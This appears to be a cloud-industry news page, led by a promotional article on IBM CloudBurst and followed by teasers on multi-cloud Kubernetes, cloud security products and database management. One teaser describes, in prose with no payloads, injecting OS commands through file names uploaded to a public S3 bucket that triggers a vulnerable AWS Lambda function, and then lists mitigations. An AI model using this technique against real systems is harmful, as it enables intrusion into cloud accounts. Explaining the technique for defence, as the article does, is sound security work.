IBM's Cloudburst: A Credible Step Forward in the Cloud Computing Arena

Abhinav Anand | June 9, 2022 | 63 views

IBM's Cloudburst
IBM CloudBurst is a ready-to-use, self-contained service delivery platform that can be deployed fast and efficiently in a data center. It enables the data center to create service platforms for a wide range of workload types with a high degree of integration, flexibility, and resource optimization, resulting in a better request-driven user experience while also reducing costs and expediting time to market for the company. In addition, the GTS installation service is included in IBM CloudBurst, making it a comprehensive bundle of hardware, software, and services to get it up and running in your environment right away.

To quickly integrate cloud computing, IBM CloudBurst combines the necessary hardware, software, and service components. IBM CloudBurst, as a single solution, simplifies the complexities of establishing a cloud computing architecture, allowing businesses to immediately grasp the benefits and financial potential of a dynamic infrastructure. For de-mystifying a cloud computing model, CloudBurst can help enterprises discover the benefits and business possibilities of a dynamic infrastructure more rapidly. As a cloud computing quickstart, IBM CloudBurst allows businesses to demonstrate the benefits of the delivery model in a specific area of their data center or for a single internal project.


Building a Dynamic Infrastructure With IBM Cloudburst

IBM’s Service Delivery Manager Solution for x86 and Power systems is based on a pre-integrated, software-only stack. It is installed as a set of virtual images that automate the deployment of IT services and enables resource monitoring, cost management, and service provisioning in the cloud.

Similarly, depending on your company's needs, you can pick how much capacity to employ by adding cloud bursting to your LSF Cluster. When time is money, the cloud is ready. The meter stops, and the cloud waits when demand is low.


Computing Heavy Workloads With Resource Planning

It's challenging to establish a delicate balance between the expense of computing resources and the cost of delayed judgments. However, with the introduction of cloud bursting, a new level of flexibility has become available to break the impasse. When space in your data center is limited, you can now extend your existing IBM Spectrum LSF cluster to the IBM Cloud, where you can access almost infinite resources and only pay for what you use.

“Automating IT resources to support new applications is critical because at most companies, a business user typically must wait weeks to get access to new IT resources due to the manual processes required to set up resources,” said Lauren States, vice president of Tivoli Cloud Computing for IBM.

This automation not only simplifies the initial creation of a proof-of-concept cluster but also provides the basic toolset for the rapid provisioning and takedown of resources that define cloud bursting.


Conclusion

One of the numerous advantages of the cloud is that you are never tied to a specific piece of hardware. If you choose a storage cluster and later require more capacity or performance, you can always rebuild it with more resources.

Today's businesses can pick from a variety of storage technologies. That is why it is critical to comprehend the many alternatives, their usefulness, and the appropriate use cases for the various storage mechanisms. To meet today's modern business needs, IBM offers a variety of storage options.

Spotlight

The Via Group, Inc.

The Via Group is recognized by some of the world’s largest corporations as the partner to deliver Unified Communications and Voice (TDM/VoIP) solutions. With roots in voice and messaging products since 1990, Via engineers bridge the gap between telephony and computing to deliver real-time messaging, unified messaging, voice, and conferencing to the desktop environment.

OTHER ARTICLES
CLOUD APP DEVELOPMENT

Vulnerable AWS Lambda Function – Initial Access in Cloud Attacks

Article | February 18, 2022

Our security research team prepared to explain a real attack scenario from the black box and white box perspective on how a vulnerable AWS Lambda function could be used by attackers as initial access into your cloud environment. Finally, we show the best practices to mitigate this vector of attack. Serverless is becoming mainstream in business applications to achieve scalability, performance, and cost efficiency without managing the underlying infrastructure. These workloads are able to scale to thousands of concurrent requests per second. One of the most used Serverless functions in cloud environments is the AWS Lambda function. One essential element of production raising an application is security. An error in code or a lack of user input validation may cause the function to be compromised and could lead the attackers to get access to your cloud account. About AWS Lambda function AWS Lambda is an event-driven, serverless compute service which permits the execution of code written in different programming languages and automates actions inside a cloud environment. One of the main benefits of this approach is that Lambda runs our code in a highly available compute infrastructure directly managed by AWS. The cloud provider takes care of all the administrative activities related to the infrastructure underneath, including server and operating system maintenance, automatic scaling, patching, and logging. The user can just use the service implementing their code and the function is ready to go. Security, a shared pain From a security perspective, due to its nature to be managed by the cloud provider but still configurable by the user, even the security concerns and risks are shared between the two actors. Since the user doesn’t have control over the infrastructure behind a specific Lambda function, the security risks on the infrastructure underneath are managed directly by the cloud provider. Using AWS IAM, it’s possible for the user to restrict the access and the permitted actions of the lambda function and its components. Misconfiguration on permission over IAM roles or objects used by the Lambda function might cause serious damage, leading attackers inside the cloud environment. Even more importantly, the code implemented into the Lambda function is under user control and, as we will see in the next sections, if there are security holes into the code, the function might be used to access the cloud account and move laterally. Attack Scenarios We are going through two attack scenarios using two different testing approaches: black box and white box testing, which are two of the main testing approaches used in penetration testing to assess the security posture of a specific infrastructure, application, or function. Looking at the Lambda function from a different perspective would help to create a better overall picture of the security posture of our function, and help us better understand the possible attacks and the related risks. Black box vs white box In Black box testing, whoever is attacking the environment doesn’t have any information about the environment itself and the internal workings of the software system. In this approach, the attacker needs to make assumptions about what might be behind the logic of a specific feature and keep testing those assumptions to find a way in. For our scenario, the attacker doesn't have any access to the cloud environment and doesn’t have any internal information about the cloud environment or the functions and roles available in the account. In White box testing, the attacker already has internal information which can be used during the attack to achieve their goals. In this case, the attacker has all the information needed to find the possible vulnerabilities and security issues. For this reason, white box testing is considered the most exhaustive way of testing. In our scenario, the attacker has read-only initial access in the cloud environment and this information can be used by the attacker to assess what is already deployed and better target the attack. In this attack scenario the attacker found a misconfigured S3 bucket open to the public where there are different files owned by the company. The attacker is able to upload files into the bucket and check the files configuration once uploaded. A Lambda function is being used to calculate the tag for each file uploaded, although the attacker doesn’t know anything about the code implemented in the lambda. We can be pretty confident there is an AWS Lambda function behind those values. The function appears to be triggered when a new object is created into the bucket. The two tags, Path and Size, seem to be calculated dynamically for each file, perhaps executing OS commands to retrieve information. We can assume the file name is used to look for the file inside the OS and also to calculate the file size. In other words, the file name might be a user input which is used in the OS command to retrieve the information to put in the tags. Missing a user input validation might lead an attacker to submit unwanted input or execute arbitrary commands into the machine. In this case, we can try to inject other commands into the file name to achieve remote code execution. Concatenating commands, using a semicolon, is a common way to append arbitrary commands into the user input so that the code would execute them if the user input isn’t well sanitized. Mitigation We have seen the attack scenario from the black box and white box perspectives, but what can we do to mitigate this scenario? In the proposed scenario, we covered different AWS components, like S3 buckets and AWS lambda, in which some security aspects have been neglected. In order to successfully mitigate this scenario, we can act on different levels and different features. In particular, we could: Disable the public access for the S3 bucket, so that it will be accessible just from inside and to the users who are authenticated into the cloud account. Check the code used inside the lambda function, to be sure there aren’t any security bugs inside it and all the user inputs are correctly sanitized following the security guidelines for writing code securely. Apply the least privileges concept in all the AWS IAM Roles applied to cloud features to avoid unwanted actions or possible privilege escalation paths inside the account. Let’s have a look at all the points mentioned above in detail on how we can enforce those mitigations. Disable the public access for the S3 bucket An S3 bucket is one of the key components in AWS used as storage. S3 buckets are often used by attackers who want to break into cloud accounts. It’s critical to keep S3 buckets as secure as possible, applying all the security settings available and avoiding unwanted access to our data or files. For this specific scenario, the bucket was publicly open and all the unauthorized users were able to read and write objects into the bucket. To avoid this behavior, we need to make sure that the bucket is available, privately applying the following security settings to restrict the access.

Read More
CLOUD APP DEVELOPMENT

Breaking the multi-cloud barrier in a regulated industry

Article | July 18, 2022

How Kubernetes and Linkerd became Lunar’s multi-cloud communication backbone At Lunar, a Scandinavian online bank, we embraced cloud native tech early on. We’ve been running Kubernetes since 2017 and today have over 250 microservices distributed across three clouds. This blog will explore how we set out to centralize all platform services. The gains were substantial — from being better prepared to absorb newly acquired companies to improved developer productivity. About Lunar Founded in 2015, Lunar set out to challenge the banking status quo by reinventing how people interact with their finances. Lunar is for those who want everything money-related in one place — 100% digital, right in their hands. For us, that meant offering customers a smarter way to manage their money with more control, faster savings, easier investments, and no meaningless fees. That’s how we envision the future of banking. In 2021, Lunar acquired Lendify, a Swedish lending company; and PayLike, a Danish fintech startup. This is all part of Lunar’s broader strategy to grow and scale. It also meant we had to integrate all these systems, so they work together smoothly. Lunar’s commitment to cloud native principles Lunar’s team of 150+ full-time engineers push about 40 releases to production on any given day. Out of these 150, ten are platform engineers, and that’s the team that I lead. We operate nine Kubernetes clusters across three cloud providers (AWS, Microsoft Azure, and Google Cloud Platform) on multiple availability zones. We also run 250+ microservices plus a range of platform services that are part of our self-service developer platform. We want our teams — or Squads as we call them — to be autonomous and self-driven. To support this “shift left” mindset, a group of platform Squads builds abstractions and tooling to ensure developers can move their features fast, securely, compliant, and efficiently. The Lendify acquisition means we now have an Azure-based platform we have to integrate and adapt, so it complies with the same cloud native principles Lunar is built on. We are currently working on seamlessly connecting our AWS and Azure environments. There are multiple reasons why we chose the cloud native path. First, we needed a platform that allowed our teams to manage their services and be fully autonomous. Secondly, as a fintech company pioneering cloud-based banking, we had to provide a clear exit strategy for cloud providers — a regulatory requirement by the Danish FSA. Kubernetes was a perfect fit. Functioning as an abstraction on top of a cloud provider, it helped us achieve both goals. This autonomy allowed us to scale easily as most dependencies were removed. Squads are also supported by a mix of open source tooling, including Backstage, Prometheus, and Jaeger, and some custom-built solutions, which we have open-sourced, such as shuttle and release-manager. This multi-cloud strategy and work style support the company’s goal of scaling, both in terms of the number of employees and mergers and acquisitions. It also allows us to stay technology agnostic and choose the technologies that best fit our needs. Oh no, where are our production logs? The idea of centralizing platform services started with our log management system Humio. At the time, we were developing failover processes for our production Kubernetes clusters. As it turned out, this led to missing logs in our log management system. That’s when we realized we had to remove the system from our production cluster and centralize it before performing any failover in production. From logs to centralizing all platform services After successfully centralizing our log management system, we decided to embark on a platform services centralization journey prior to any corporate acquisitions. While we had multiple environments, many of our platform services, such as our observability stack, were replicated in each environment. These services require a vast amount of resources and are fairly complex. Services such as Humio, Prometheus, and Jaeger (with Elasticsearch), are stateful services. Having stateful services in “workload” clusters makes failover and disaster recovery much harder. For this reason, we decided to minimize the number of stateful services in these environments. Additionally, running nine replicated setups, simply didn’t scale — we needed a centralized solution. Moreover, having multiple endpoints for accessing things like Grafana, led to lots of duplication of users, dashboards, etc. This caused some confusion for our developers, changes had to be made in multiple places, leading to drift between environments, and other challenges. Managing users in one system was a lot more efficient than doing so in nine (or more). That’s why we decided to create a centralized cluster owned by the platform team that would eventually run the entire observability stack, release management, developer tooling, and cluster-API. Today, our log and release management runs as centralized services the platform team provides. Also, Backstage is provided out of the centralized environment along with a handful of other tools. Next in line is our monitoring setup, a mix of Buoyant Cloud and Prometheus/Grafana. The quest to connect our clusters Once we started centralizing platform services, we needed to connect our clusters. At the time, we were only running clusters in AWS and considered VPC peering across our accounts. Doing that was somewhat painful due to clashing CIDR ranges. We also evaluated VPNs but aren’t big fans of using technologies with two static boxes on each end. Besides, we wanted to move towards zero trust networking, following the principles of BeyondProd by Google. Service meshes finally caught up with our needs! We continuously evaluated service meshes during our 5+ years of running Kubernetes in production. In 2017, we had Linkerd running as a PoC but decided against it. It was still the JVM-based Linkerd 1 and quite complex. We kept following the development and evolution of service meshes and, when we saw the Linkerd 2.8 release and its multi-cluster capabilities, we realized it was time to give service meshes another shot. Our decision was further reinforced by some problems we were experiencing with gRPC load balancing (which is not natively supported by Kubernetes) and the need to switch to mTLS for all internal communication. A service mesh made a lot more sense now. While we evaluated both Linkerd and Istio, we have always been big fans of the approach Linkerd took: start with the basics and make that work well. We gave ourselves a week: two engineers; one playing with Istio and the other one with Linkerd. We had the Linkerd multi-cluster up and running within an hour! After a few days of struggling with Istio, we gave up on it. Linkerd did the job fast and easily — the perfect mesh for us. It had all the features we needed at the time; was easy to operate, had a great community, and solid documentation. Since going live, we also started using Buoyant Cloud for better visibility across all our environments. Lunar is committed to the CNCF stack At Lunar, we are big fans of CNCF projects and use many of them (in fact, I’m a CNCF Ambassador and love educating the community on these awesome projects!). Lunar is also a CNCF End User Member. Our stack includes Kubernetes, Prometheus, cert-manager, Jaeger, Core DNS, Fluent-bit, Flux, Open Policy Agent, Backstage, gRPC, and Envoy among others. We’ve built an Envoy-based ingress/egress gateway in all clusters to provide a nice abstraction for developers to expose services in different clouds. Prepared to scale our business and shake up the European banking market From a technology perspective, we have now achieved a fairly simple way to provide and connect clusters across clouds. Kubernetes allows us to run anywhere, Linkerd enables us to seamlessly connect our clusters, and GitOps provides an audited way to manage our environments across multiple clouds with the same tooling and process. And from a developer perspective, whether you deploy on GCP or AWS, the process is identical. Seamless integration with newly acquired startups The business impact has been substantial. With our new multi-cloud communication backbone, we are better positioned to support upcoming mergers and acquisitions — a key part of our business strategy. Having a cloud agnostic way to extend the Lunar platform regardless of where they run, is incredibly powerful. It also allows us to select the provider that best fits our needs for each use case. Fully prepared for DR while compliant with government regulations The fact that we are no longer losing logs during failover is huge. We’ll soon implement quarterly failovers for our production clusters. We need to ensure we know exactly how our system behaves in case of a failure and how to bring it back up. It’s important both from a regulatory perspective and a business perspective. If our customers were to lose access to their account information, it would have disastrous consequences for our business. That’s why we proactively train for the worst-case scenario. If something were to happen, we would know exactly what to do and how to avert an issue. We are big believers in the pets vs. cattle idea but go a step further. We don’t want to have pet servers or pet clusters either. Imagine losing logs each time we perform a failover. Without audit logs, we’d fall out of regulatory compliance right there and then. Centralized services and streamlined processes increased developer productivity Centralizing most of our platform services has already streamlined many processes and improved developer productivity. We ensure that all releases, metrics, logs, traces, etc., are properly tagged with fields such Squad names, environments, and so on, making it easy for developers to find what they are looking for. It also ensures clear ownership of that particular piece. Managing the team is also a lot simpler. For me, that means I don’t have to set up dashboards, help search through logs, etc. — our Squads are truly independent. Because our platform is based on self-service, it is decoupled from the organization allowing our team to focus on implementing the next thing that will help our developers move faster, be more secure, or ensure better quality. Easy audits and peace of mind for management Then there are the easy audits. Since everything is centralized, we can run audit reports for all clouds and services across groups and environments. That is good for us and provides peace of mind in the highly-regulated financial services industry. While we aren’t there yet, we expect to save significant time in engineering resources by not having to operate and maintain nine versions of the soon-to-be fully centralized stack. Well-positioned to scale fast and smoothly Overall we feel well-positioned for upcoming acquisitions and organic growth. With a platform able to extend anywhere, we’ve become a truly elastic organization.

Read More
CLOUD APP DEVELOPMENT

Elastic releases security solution for the cloud

Article | May 20, 2022

Elastic announced the launch of Elastic Security for Cloud, extending the capabilities of the existing Elastic Security offering, which included SIEM and endpoint protection, to incorporate cloud risk and posture management and cloud workload protection. The new solution allows enterprises to manage their security posture for cloud-native and hybrid environments with infrastructure detection and response (IDR) and a machine learning offering that can detect known and unknown threats in cloud environments. This approach means that enterprises can detect and respond to malicious activity in the cloud as soon as possible to minimize the risk and damage caused by intrusions. Addressing cloud complexity The release comes as modern enterprises are struggling to secure cloud environments. Research shows that not only are 76% of organizations using two or more cloud providers, but also that 35% of organizations have more than 50% of their workloads in the cloud. This means for many organizations, protecting the cloud attack surface is now vital to maintaining operational stability. In other words, the complexity of cloud deployments has created a need for solutions with cloud detection and response capabilities, so that enterprises can respond to threat actors who are targeting this new attack surface. “The world has rapidly transitioned to the cloud and chosen operations over security. Cloud infrastructure is stood up and torn down at a blazing rate and many different teams are deploying these cloud instances. Just answering the question, ‘Am I good?’ is an increasingly complex question to answer for CIO/CISOs,” Mike Nichols, vice president of product for Elastic Security Elastic’s answer to monitoring these environments, is a cloud posture management and IDR solution that can improve security teams visibility over external threats. The cloud security market Elastic Security is competing in the global cloud security market, which researchers valued at $40.8 billion in 2021 and anticipate will grow to $77.5 billion by 2026 as enterprises attempt to keep up with the increasing sophistication of cyberattacks, and rise in bring your own device (BYOD) and (choose your own device) policies. In the realm of cloud security, one of Elastic’s main competitors is Splunk, a cloud and observability monitoring platform that can monitor public clouds, apps, services, on-premise data centers, and edge services. Last year, Splunk announced it had received a $1 billion investment from Silver Lake. Another competitor in the market is Wazuh, an XDR and SIEM tool designed for protecting endpoints and cloud workloads with vulnerability detection, log data analysis, workload protection, and container security. Wazhu currently has more than 10 million downloads per year and is used by a range of companies including Verifone, Walgreens, Rappi, Grubhub, Intuit, and more. Although, one of the key differentiators between Elastic Security is that the solution is built on the Elastic Search Platform, with analytics, SIEM, endpoint protection, XDR and cloud security all offered as part of one single offering.

Read More
CLOUD APP DEVELOPMENT

Database Management in the Cloud Computing Era

Article | May 20, 2022

Database Management in the Cloud Computing Era A cloud computing database is ideally a service that is built, deployed, and delivered via a cloud platform. A cloud platform as a service (PaaS) delivery model allows organizations, end-users and applications to store, manage and retrieve data using the cloud. When seen from a structural and design perspective, a cloud database is not very different from one that operates its business using its own on-premise servers. However, ever since big data has entered space, database management has become a little more complex. In addition to all the traditional and structured data, we also have semi-structured and unstructured data coming in from almost all directions. In recent times, there has been significant adoption of cloud platforms, infrastructures and services. The idea of the blend of cloud technology with database services has garnered more demand with respect to management. Cloud databases, which arealso widely termed Database-as-a-Service (DaaS), offer various added options for organizations to choose. With the current rate of adoption, experts have a strong feeling that DaaS will, just like any other "as-a-service", will become the standard solution for all highly sensitive and mission-critical data. How Can Cloud Database Management Help Your Business? Every organization has the constant need to manage its data in the most efficient way possible. A cloud database effectively fulfills all the needs of any organization with respect to data, ranging from keeping the information secure, accurate and consistent for resource utilization and optimal performance. Cloud data management is constantly changing the way organizations think about data. The cloud helps bring in the required versatility, security, and professional data management assistance that is required. For any business to survive and succeed, it should ensure that the data is healthy so that everyone in the organization has access to the data they need, when they need it. "Line-of-business leaders everywhere are bypassing IT departments to get applications from the cloud (also known as software as a service, or SaaS) and pay for them similar to a magazine subscription. And when the service is no longer required, they can cancel that subscription with no equipment left unused in the corner." - Daryl Plummer, Gartner analyst Effective Strategies forDatabase Management in Cloud Computing Using a cloud-based database ensures that it is easy for your database to grow along with your needs and requirements, in addition to scaling up or down on-demand to accommodate specific peak-workload phases. Ideally, before procuring a cloud data management system, it is essential to have a solid strategy that would suit best with your organization's ecosystem and, at the same time, would also help you getthe most out of the system you select. Exploring the Best Practices for DBM in Cloud Computing With the idea ofeffectively developing, monitoring and managing database infrastructure, there are various methods that organizations can use. These days, organizations also have the option for a ready-made database management system or picking a tailored solution as per their requirements. Keeping all these aspects in mind, it is also essential that these organizations enroll themselves in the best practices followed to ensure optimum results are achieved. Some of the best practices for database management in cloud computing are mentioned below: Before moving to the cloud, build a robust data management architecture. Give cloud data integration requirements the first priority. Regardless of the data's platform or location, govern it comprehensively. Use encryption and VPN to protect data in transit. Automate database management tasks to keep track of them. Why Is Cloud DBMS the C-Suite’s Pick? While it is more than evident that in today's age and time, data management is one of the most crucial components of any organization, it is also right up the area of value addition for all the top executives in an organization. Every industry relies vastly on data and its management, with the significant shift towards cloud servicestaking place constantly several organizations and the c-suite are now evaluating what cloud services bring to their table, especially on the data front. Once the core pain points are assessed and the c-suite gets the picture of how cloud database management systems would help them become more efficient, there wouldn't be any other obvious choice. Microsoft Consulting Services, along with Tata Consultancy Services (TCS), partnered with Walgreens to create the Information, Data, and Insights (IDI) platform powered by Azure.When patients or medical providers initiate the prescription fulfilment process, Azure Databricks and Azure Synapse Analytics move hundreds of related data points through the IDI. Pharmacists can access information through a centralized dashboard interface and request data visualizations.Pharmacists gain real-time insights, and the system can scale as needed to meet current needs. During peak times, the platform can handle more than 40,000 transactions per second. Compared to Walgreens’ previous solution, the private cloud-based architecture, saves an enormous amount of time on every transaction — prescription data that once took about 48 hours to reach its data warehouse can be handled by Walgreens within minutes. Conclusion With the next big things being data and the cloud, how can an amalgamation of both be wrong? Having said this, everyone willhave their own share of concerns and questions. But with what is being built and functions being worked upon, this space is bound to bring in numerous opportunities. So when the world is slowly makingthis shift, it's time you reconsidered, if you haven't already, before you get overwhelmed at the helm of data! FAQ What Are the Best Features Available in Cloud Database Management? While there are numerous features that one can leverage using Cloud Database Management, the top 5 of its features are listed below: Elasticity Scalability High availability Easy data reduction Redundancy Which Is the Most Popular Cloud Database? One of the most popular and widely used cloud databases is the Microsoft Azure cloud database. It provides services in computing, networking, databases, analytics, artificial intelligence, and the Internet of Things. In Cloud Computing, What Is Database Management? Cloud data management is a technique for managing data across cloud platforms, either in combination with or instead of on-premises storage. Disaster recovery, backup, and long-term archiving can benefit from using the cloud as a data storage tier. In addition, resources can be acquired as needed using cloud data management.

Read More

Spotlight

The Via Group, Inc.

The Via Group is recognized by some of the world’s largest corporations as the partner to deliver Unified Communications and Voice (TDM/VoIP) solutions. With roots in voice and messaging products since 1990, Via engineers bridge the gap between telephony and computing to deliver real-time messaging, unified messaging, voice, and conferencing to the desktop environment.

Related News

CLOUD APP DEVELOPMENT

BCS Joins Google Cloud Partner Advantage

BCS | August 03, 2022

BCS Data Center Operations (BCS), one of North America’s leading critical infrastructure facility management providers, has joined the Google Cloud Partner Advantage program as a Google Cloud partner. The designation expands BCS Cloud Services while reinforcing their single-source, self-performance operations model. As a Google Cloud partner, and as part of the BCS Cloud Services solution, BCS customers can speed cloud migration and adoption while decreasing overall Google Cloud expenditures. BCS Cloud Services features a free cloud architecture consultation, frameworks to facilitate change management, and utilization of rules-based industry best-practices. “BCS Cloud Services is yet another example of BCS’s industry-leading self-performance model, BCS Cloud Services and the Google Cloud partner designation provides customer peace of mind by freeing their IT teams to focus on their core activities, while we help enable their organization’s cloud journey.” BCS Chief Government Programs Officer Craig Harris BCS Cloud Services expands BCS’s growing Government Programs solution set while enhancing the BCS self-performance operations model. This model means BCS employees perform a minimum of 80% of all services, decreasing operating costs by more than 20%. This practice is in contrast with the less efficient and more costly common industry practice of contracting with multiple vendors and subcontractors. Last year BCS expanded its solutions portfolio to include a BCS Government Programs division dedicated to supporting federal, state and local government entities. Earlier this year, BCS was awarded Texas Department of Transportation contracts to perform critical infrastructure HVAC, maintenance and installation services for multiple Texas districts. About BCS BCS is an enterprise-level, critical facilities operations company focusing exclusively on data centers. The BCS solutions portfolio includes facility management, IT services, physical security and a range of value-added professional services through one fully integrated self-performance model. BCS utilizes advanced technology and centralized services, including BCS CriticalWorksTM, BCS CriticalCareTM, BCS Tactical Operations Center and BCS Government Programs, to achieve increased performance, efficiency and scale. BCS serves the needs of Fortune 500 companies with more than 7.5 million total square feet and more than 450 MW of data center critical power under contract.

Read More

CLOUD SECURITY

Micro Focus' CyberRes Partners with Google Cloud to Enable High-Scale Secure Cloud Analytics with Data Privacy

Micro Focus | August 09, 2022

CyberRes, a Micro Focus line of business, today announced a partnership with Google Cloud to support the upcoming release of BigQuery remote functions. The partnership will see CyberRes' end-to-end enterprise data protection solution, Voltage SecureData, integrate with Google's BigQuery data warehouse to accelerate and expand organizations' data science initiatives and help companies comply with ever-evolving privacy regulations. The integration will enable CyberRes Voltage customers to persistently protect data in use, in motion, and at rest in Google BigQuery. The support for remote functions also enables Google Cloud's BigQuery customers to take advantage of Voltage's privacy-enabling technologies. Mutual customers can use Voltage's format-preserving encryption, hashing, and tokenization services within BigQuery in conjunction with Google BigQuery's native security to address strict privacy compliance controls. Voltage's cloud-agnostic and consistent data protection allows all customers to safely use regulated data for analytics across hybrid clouds. "The availability of remote functions from BigQuery is an exciting and critical evolution of Google Cloud's platform for our customers," said Tony de la Lama, Vice President of Product Management, CyberRes. "The integration with Voltage SecureData means BigQuery will allow customers to utilize and support the Voltage data-centric protection approach for secure analytics, enabling enterprises to accelerate and expand their data science initiatives with privacy by default." BigQuery, Google Cloud's highly scalable multi-cloud data warehouse, is designed for business agility and allows customers to gain insights with real-time and predictive analytics, access data and securely share insights with ease. This new partnership adds to Voltage SecureData's deep capabilities in securing analytics across data warehouses, databases and data lakes and enables customers to shift workloads seamlessly and securely to BigQuery. "Emerging threats and evolving technology needs are at the forefront of challenges in cyber security. By making its Voltage SecureData solution available to Google Cloud customers from within their BigQuery data warehouse, CyberRes is enabling customers with the technologies needed to protect their sensitive data while addressing and adhering to current data privacy regulations," Ritika Suri, Director, Technology Partnerships, Google Cloud The CyberRes Voltage portfolio helps secure organizations with continuous data discovery, insight, and protection to reduce risk and enable privacy by design. Organizations can work with high-value, sensitive customer data in its protected state to derive business intelligence without the risk of data exposure in Google BigQuery. The data protection technologies in Voltage SecureData provide flexible implementation and data-centric protection for a virtually unlimited number of structured data types in any language, and in any region, with proven performance, reliability, and scalability. About CyberRes CyberRes is a Micro Focus line of business. We bring the expertise of one of the world's largest security portfolios to help our customers navigate the changing threat landscape by building both cyber and business resiliency within their teams and organizations. CyberRes is part of a larger set of digital transformation solutions that fight adverse conditions so businesses can continue to run today, keep the lights on, and transform to grow and take advantage of tomorrow's opportunities.

Read More

CLOUD APP DEVELOPMENT

Snyk Unveils Snyk Cloud, the Industry's First Developer-Centric Cloud Security Solution

Snyk | July 27, 2022

Snyk, the leader in developer security, today unveiled Snyk Cloud, announcing the launch of the industry's first comprehensive Cloud Security Solution designed by and for developers. This latest development was made possible by the acquisition of Fugue earlier this year. Thoughtfully designed with global DevSecOps teams in mind, Snyk’s Cloud Security solution unites and extends existing products Snyk Infrastructure as Code and Snyk Container with Fugue’s leading cloud security posture management (CSPM) capabilities. These elements are now powerfully combined to realize a fully featured cloud security solution that allows today’s modern developers to continue their rapid pace of innovation securely. The Snyk Cloud product extends the company’s existing Developer Security Platform in a significant way, allowing more companies to embrace DevSecOps and spark further effective collaboration between their developer, operations, security and compliance teams. Instead of grappling to patch together multiple, incompatible cloud and application security solutions, ultimately leading to a fragmented view of application security in the cloud, global developers now have the ability to take full ownership of their infrastructure. At the same time, their security counterparts can define and operate a consistent cloud security posture across the entire software development lifecycle (SDLC). With the digital era’s ever rising need for innovation speed, siloed application and cloud security tools that focus on detecting issues after deployment are too slow and risky, creating growing tension between developer and security teams. With the addition of Snyk Cloud, Snyk customers will now be the first to benefit from a unified platform and policy engine that equips them to create secure deployments via an unmatched feedback loop – from code to cloud and back to code – securing their cloud before deployment and maintaining its secure integrity while running as well as then assessing and prioritizing the precise places to provide fixes back in the code. In fact, over the past year, Snyk customers have reported that they improve their security risk posture by more than 60% by reducing the time it takes to find and fix vulnerabilities. “Snyk’s developer-first approach disrupted the application security industry and we’re now aiming to apply many of those lessons learned to the fastest growing segment of cybersecurity today: cloud security, Predicted to be worth $77.5 billion by 20261, this is an area ripe for change. Today’s news represents another important milestone for the developer security movement, and we look forward to the industry’s response to our vision of uniting AppSec and CloudSec teams to secure today’s apps more efficiently.” Peter McKay, CEO, Snyk “Our global customers have witnessed firsthand how previous cybersecurity tenets have evolved profoundly, with cloud infrastructure now changing just as fast as the apps themselves. They’re eager for one comprehensive solution that provides a truly complete cloud picture, driving DevSecOps by enhancing developer productivity securely,” said Adi Sharabani, CTO, Snyk. “We’re incredibly proud to reveal this industry gamechanger, Snyk Cloud, the first developer security product designed for the cloud era in order to address every important stage of a modern app’s life today from development through to production.” Now Powered by Snyk: The Cloud Security Podcast In timing with AWS re:Inforce, Snyk has introduced two exciting new cloud security hires, Ashish Rajan and Shilpi Bhattacharjee, founders of the Cloud Security Podcast, which is now officially powered by Snyk. In their new roles, Ashish will be Snyk’s first Cloud Security Advocate, while Shilpi will continue to serve as Lead Program Manager for the Cloud Security Podcast. As with the Secure Developer Podcast and DevSecCon, Snyk is committed to continuing to build these global communities that foster education, thought leadership and promote secure development. Please visit here to read more about what’s ahead for Ashish, Shilpi and the incredible cloud security community that they have fostered over the last several years. Snyk is a Diamond sponsor at AWS re:Inforce, a learning conference focused on security, compliance, identity and privacy taking place in Boston, July 26-27, 2022. Snyk Cloud is currently available on a limited basis with general availability planned in the Fall 2022. To see Snyk Cloud in action, visit the company’s booth (#408) or sign up for a demo here. About Snyk Snyk is the leader in developer security. We empower the world’s developers to build secure applications and equip security teams to meet the demands of the digital world. Our developer-first approach ensures organizations can secure all of the critical components of their applications from code to cloud, leading to increased developer productivity, revenue growth, customer satisfaction, cost savings and an overall improved security posture. Snyk’s Developer Security Platform automatically integrates with a developer’s workflow and is purpose-built for security teams to collaborate with their development teams. Snyk is used by 2,000+ customers worldwide today, including industry leaders such as Asurion, Google, Intuit, MongoDB, New Relic, Revolut and Salesforce.

Read More

CLOUD APP DEVELOPMENT

BCS Joins Google Cloud Partner Advantage

BCS | August 03, 2022

BCS Data Center Operations (BCS), one of North America’s leading critical infrastructure facility management providers, has joined the Google Cloud Partner Advantage program as a Google Cloud partner. The designation expands BCS Cloud Services while reinforcing their single-source, self-performance operations model. As a Google Cloud partner, and as part of the BCS Cloud Services solution, BCS customers can speed cloud migration and adoption while decreasing overall Google Cloud expenditures. BCS Cloud Services features a free cloud architecture consultation, frameworks to facilitate change management, and utilization of rules-based industry best-practices. “BCS Cloud Services is yet another example of BCS’s industry-leading self-performance model, BCS Cloud Services and the Google Cloud partner designation provides customer peace of mind by freeing their IT teams to focus on their core activities, while we help enable their organization’s cloud journey.” BCS Chief Government Programs Officer Craig Harris BCS Cloud Services expands BCS’s growing Government Programs solution set while enhancing the BCS self-performance operations model. This model means BCS employees perform a minimum of 80% of all services, decreasing operating costs by more than 20%. This practice is in contrast with the less efficient and more costly common industry practice of contracting with multiple vendors and subcontractors. Last year BCS expanded its solutions portfolio to include a BCS Government Programs division dedicated to supporting federal, state and local government entities. Earlier this year, BCS was awarded Texas Department of Transportation contracts to perform critical infrastructure HVAC, maintenance and installation services for multiple Texas districts. About BCS BCS is an enterprise-level, critical facilities operations company focusing exclusively on data centers. The BCS solutions portfolio includes facility management, IT services, physical security and a range of value-added professional services through one fully integrated self-performance model. BCS utilizes advanced technology and centralized services, including BCS CriticalWorksTM, BCS CriticalCareTM, BCS Tactical Operations Center and BCS Government Programs, to achieve increased performance, efficiency and scale. BCS serves the needs of Fortune 500 companies with more than 7.5 million total square feet and more than 450 MW of data center critical power under contract.

Read More

CLOUD SECURITY

Micro Focus' CyberRes Partners with Google Cloud to Enable High-Scale Secure Cloud Analytics with Data Privacy

Micro Focus | August 09, 2022

